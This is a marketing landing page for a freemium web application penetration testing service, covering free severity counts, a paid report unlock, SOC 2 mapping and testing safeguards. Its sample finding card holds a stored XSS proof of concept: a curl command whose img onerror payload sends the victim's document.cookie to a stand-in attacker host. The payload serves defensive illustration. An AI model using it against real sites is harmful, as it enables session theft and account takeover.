Early access · Penetration testing

Free pentest. Pay only to unlock the report.

We run an authorized penetration test against your web application at no cost and share the severity counts. Unlock the full findings (reproduction steps, CVSS scores, remediation guidance, and SOC 2 evidence) for a fixed price written into the authorization before we begin.

No credit card 24h reply with proposal 7 to 14 day delivery
Sample severity counts: what arrives free
Critical 1
High 2
Medium 4
Low 6
Informational 3
OWASP WSTG-aligned SOC 2 evidence Signed authorization Non-destructive testing Re-test included
Why this exists

Most early-stage SaaS ships with critical exposure nobody is testing for.

A traditional pentest costs EUR 8,000 to EUR 40,000 and takes two months from procurement to delivery. So founders push it past the SOC 2 audit, past the enterprise procurement review, and sometimes past the breach.

We removed the cost barrier on the front end so the conversation can start with findings, not invoices. You only pay when there's something worth paying for, and you decide whether the report is worth the price after you've already seen the severity counts.

8/10
Early-stage SaaS web apps we test surface at least one critical or high finding on the first pass.
How it works

Four steps. Seven to fourteen days end to end.

No procurement loop. No quarterly waiting list. No day-rate negotiation. The whole front end runs on a single form and a single call.

1

Tell us about your stack

Work email and the URL of the application you want tested. That is the whole form.

~30 seconds
2

Scoping call

Fifteen minutes to confirm in-scope assets, authentication roles, and out-of-scope subsystems. Unlock price quoted the same day.

15 minutes
3

Authorization signed

A short document defines scope, rate limits, non-destructive rules, and the fixed unlock price. We don't start before it's countersigned.

Same week
4

Results delivered

Severity counts arrive free. Unlock the full report to receive findings, CVSS, reproduction steps, remediation guidance, and SOC 2 evidence.

7 to 14 days
What you get

Free severity counts. Paid unlock for the full report.

The free tier exists so you can make an informed decision about the paid tier. If we find nothing critical, you owe nothing.

Step one

Free baseline

No cost · No obligation
  • Count of critical findings
  • Count of high-severity findings
  • Count of medium-severity findings
  • One-paragraph executive summary
  • 24-hour heads-up if anything critical is confirmed mid-test
Step two (optional)

Full report unlock

Fixed price · Set before testing
  • Every finding with description, evidence, and screenshots
  • CVSS 3.1 score and CWE classification
  • Reproduction recipe so your engineers can confirm the fix
  • Remediation guidance with code-level suggestions
  • SOC 2 control mapping (CC4.1, CC7.1, CC7.4) for your auditor
  • One free re-test of remediated findings within 60 days
  • Letter of attestation suitable for procurement and investor review
How pricing works. The unlock price depends on company size, industry, and scope (subdomains, authenticated roles, APIs). It's written into the authorization document before any testing begins. No surprise invoice.
Sample finding

This is what a single finding looks like.

Every finding in the paid report follows the same structure: classification, evidence, reproduction recipe, blast radius, and a remediation snippet engineers can ship without a follow-up meeting.

The card on the right is illustrative. Download a sanitized six-page sample of the full report below.

Download sample report (PDF)

SP-001 · Finding detail
Critical CVSS 9.0 CWE-79
Stored XSS in comment renderer
POST /api/v1/comments · rendered at /app/threads/{id}
Proof of concept
curl -X POST https://app.example.com/api/v1/comments \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"body":"<img src=x onerror=fetch(\"https://attacker.tld/?c=\"+document.cookie)>"}'
Why it matters
The payload renders unsanitized in every comment-list view. Any authenticated user with write permission can pivot to session theft for every viewer of the affected thread, including admins.
Remediation
// Sanitize on render, not on write.
import DOMPurify from "dompurify";
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(comment.body) }} />
Audit-ready evidence

Mapped to SOC 2 controls and OWASP WSTG.

Auditors want evidence, not screenshots. The paid report cross-references each finding to the SOC 2 trust criteria it touches, and our testing coverage maps to the OWASP Web Security Testing Guide so you can show full scope, not selective sampling.

SOC 2 controlWhat we test forOWASP WSTG section
CC4.1 MonitoringDetection coverage on injection, broken auth, and privilege escalation pathsWSTG-INPV, WSTG-ATHN, WSTG-ATHZ
CC7.1 System operationsLogging completeness and tamper resistance under attacker activityWSTG-ERRH, WSTG-CRYP
CC7.4 Incident responseVerifies that alerts fire on the attack patterns your runbook claims to coverWSTG-CONF, WSTG-IDNT

After remediation, we re-test the same controls and issue a follow-up attestation. The re-test is included in the unlock price for 60 days.

Safety and legal

How we keep the test from breaking production.

Authorized penetration testing has been a defined practice for over twenty years. We do nothing without your signed permission, and once we have it, we follow a tight set of operational rules so the test never becomes the incident.

Domain ownership verification

We confirm you control the asset via DNS TXT record or a signed letter on company letterhead. No exceptions, even when the customer is a known partner.

Rate-limit ceiling

Automated probes are capped at 10 requests per second per host. Manual exploitation runs at human speed. Your monitoring will see traffic, not pressure.

Non-destructive testing

We don't delete, modify, or exfiltrate production data. Proof-of-concept evidence is captured at the minimum depth needed to confirm the vulnerability.

Encryption in transit and at rest

Findings, proofs, and screenshots are encrypted end to end. Access is limited to the lead tester and one reviewer.

Data retention

Reports are retained for 90 days to support the included re-test, then deleted on request. We never share findings with anyone outside the engagement.

Out-of-scope respect

Anything declared out of scope in the authorization is treated as production-critical. If a finding chains through it, we stop and check in before going further.

Optional add-on

OSINT: what the internet already knows about your team.

The pentest covers your application. The OSINT add-on covers the perimeter you cannot patch: leaked credentials in public dumps, exposed S3 buckets indexed by search engines, GitHub repositories with hardcoded tokens, and the LinkedIn footprint that makes targeted phishing trivial.

Priced as a separate engagement. Most teams add it on the second cycle, after the application findings are remediated.

OSINT scan covers

  • Credential dumps and breach datasets
  • Public code repositories
  • Cloud storage indexes and metadata leaks
  • Social engineering surface mapping
  • Typo-squat and lookalike domain monitoring
Request

Get scoped this week.

Drop your work email and the URL of the application you want tested. We reply within 24 hours with a proposed scope, the unlock price, and a 15-minute call slot.

  • Reply within 24 hours including the exact unlock price.
  • We quote directly. No sales handoff.
  • You see the severity counts before you decide whether to unlock.
  • The page never shows a price tag because every engagement is scoped.

Request a free pentest

Two fields. We do the rest.

No credit card. No commitment. You'll receive the proposal and the exact unlock price within 24 hours.

FAQ

Questions we get every week.

How long does the engagement take? +
Most engagements run 7 to 14 days from authorization to delivery. The 15-minute scoping call usually happens within 24 hours of the request, and the authorization is signed the same week.
What happens if you find nothing serious? +
You still get the free severity counts and a short summary. You're under no obligation to unlock the full report if there's nothing critical or high. A clean baseline is itself a useful artifact for investors and procurement teams.
What if you find something exploitable? +
You get notified within 24 hours of confirmation, before delivery, so your team can begin remediation immediately. The full report includes a reproduction recipe, blast-radius assessment, and a patch suggestion for each finding.
How is the unlock price set? +
Price is a function of company size, industry, and scope (number of subdomains, authenticated roles, APIs). It's written into the authorization document before any testing begins. You will never receive a surprise invoice.
Is this legal? +
Yes. Penetration testing under a signed authorization has been standard practice for over twenty years. The authorization document grants explicit permission, defines scope (in-scope and out-of-scope assets), sets a rate limit ceiling, and confirms non-destructive testing rules. Without that document, no testing happens.
How long do you keep my data? +
Findings and proofs are encrypted in transit and at rest, retained for 90 days for re-testing and SOC 2 evidence purposes, then deleted on request. We don't exfiltrate customer data; proofs are scrubbed to the minimum needed to confirm the vulnerability.

Find out what an attacker would find first.

Free baseline. Paid unlock only if there's something worth paying for. Scoped this week.

Request a free pentest
No credit card · No procurement loop · 24h reply with the exact unlock price
Request a free pentest